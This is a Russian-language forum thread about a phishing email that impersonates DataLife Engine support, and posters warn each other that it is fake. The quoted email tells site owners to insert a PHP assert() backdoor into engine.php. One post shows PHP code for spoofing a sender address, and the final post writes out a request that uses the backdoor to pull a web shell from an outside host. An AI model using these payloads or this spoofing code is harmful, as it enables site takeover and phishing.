Критическая уязвимость на DLE

12
G-and-Y
На сайте с 29.06.2013
Offline
185
#11
Casan:
Конечно, фейк. Не иначе. Заголовки письма глядите всегда.
<?
$Name = "dle-news.ru"; //от кого
$email = "tech@dle-news.ru"; //какой e-mail adress
$recipient = "mymail@yandex.ru"; //кому
$mail_body = "Не важно какой текст"; //текст
$subject = "Баг в DLE"; //тема
$header = "From: ". $Name . " <" . $email . ">\r\n"; //optional headerfields

ini_set('sendmail_from', $email);

mail($recipient, $subject, $mail_body, $header);
?>

А так даже не поможет просмотр заголовка письма, только проверка информации.

Абузо-устойчивые впс ( http://vps-hosting.lv/?p=13408 )
дани мапов
На сайте с 06.09.2012
Offline
204
#12

Будут они еще заморачиваться с рассылкой, писали же что вся информация о багах на сайте.

Написание и доработка скриптов (PHP, MySQL, JavaScript, jQuery) (/ru/forum/811046)
SI
На сайте с 04.07.2013
Offline
15
#13
дани мапов:
Будут они еще заморачиваться с рассылкой, писали же что вся информация о багах на сайте.

Как celsoft отвечал в личку, что рассылку делают при нахождении критического бага, а там где Администратор лопух, рассылка не выполняется нужно посещать указанный раздел и смотреть в админке скрипта новости подгружаемые при проверке обновления.

О
На сайте с 04.08.2009
Offline
145
#14

Получил письмо :)

admin,

Данное письмо вам отправил support@dle-news.ru с сайта http://***.ru/

------------------------------------------------
Текст сообщения
------------------------------------------------

Здравствуйте, уважаемый клиент!



Благодарим Вас за использование на Вашем сайте ***.ru нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: ***.ru/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);



С уважением,

Служба поддержки «DataLife Engine»

IP адрес отправителя: 162.244.33.213

------------------------------------------------
Помните, что администрация сайта не несет ответственности за содержание данного письма

С уважением,

Администрация http://***.ru/

В тред приглашается представитель King-Servers.com

Влазить напрямую в базу — это невозможно © Игорь Белов, mchost.ru
Mad_Man
На сайте с 10.11.2008
Offline
162
#15
Окей:
В тред приглашается представитель King-Servers.com

А толку его приглашать? В саппорт абузу накатать на мыло и жить дальше.

King-Servers
На сайте с 27.10.2011
Offline
46
#16

Здравствуйте. Спасибо что сообщили. Мы посмотрели, на этом сервере находит впн сервис, по этому проблему решить нельзя.

Если хотите, можем закрыть доступ с серверов к вашим ресурсам. Для этого пишите в абуз департамент king-support.com

King Servers - VDS/VPS & Dedicated Servers. CDN. Backup. Веб-Хостинг. Скидки. Акции. (http://king-servers.com)
Fugu
На сайте с 02.08.2008
Offline
69
#17

И меня сегодня порадовали таким письмом с того же IP 162.244.33.213

мои подопечные http://akwadom.ru (http://akwadom.ru), http://морякам.рф/ (http://морякам.рф/)
[umka]
На сайте с 25.05.2008
Offline
456
#18
Fugu:
И меня сегодня порадовали таким письмом с того же IP 162.244.33.213

Написали же выше: "проблему решить нельзя".

Задача неразрешима.

Тему можно закрывать.

Лог в помощь!
E
На сайте с 22.06.2008
Offline
70
#19

Мне пришло такое письмо на днях, .....*валяццо пацталом* с этого письма))))Тут же и дураку понятно что потом можно сделать чтото вроде

infected_file.php?DATALIFEENGINE=copy("http://host.com/shell.txt","./shell.php");

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий